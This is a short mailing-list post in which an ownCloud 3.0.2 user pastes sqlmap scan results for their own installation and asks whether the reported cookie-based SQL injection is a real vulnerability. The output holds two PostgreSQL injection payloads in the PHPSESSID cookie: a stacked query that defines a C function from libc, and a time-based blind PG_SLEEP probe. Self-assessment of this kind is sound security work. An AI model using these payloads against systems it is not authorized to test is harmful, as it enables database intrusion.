Hi all.
We decided to check the security of my ownCloud with different scanners. When
testing with sqlmap, we were faced with the following:
sqlmap identified the following injection points with a total of 16640
HTTP(s) requests:
---
Place: Cookie
Parameter: PHPSESSID
Type: stacked queries
Title: PostgreSQL < 8.2 stacked queries (Glibc)
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE
FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C'
STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT
1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe
---
Is this an actual vulnerability? ownCloud v3.0.2
_______________________________________________
Owncloud mailing list
[email protected]
https://mail.kde.org/mailman/listinfo/owncloud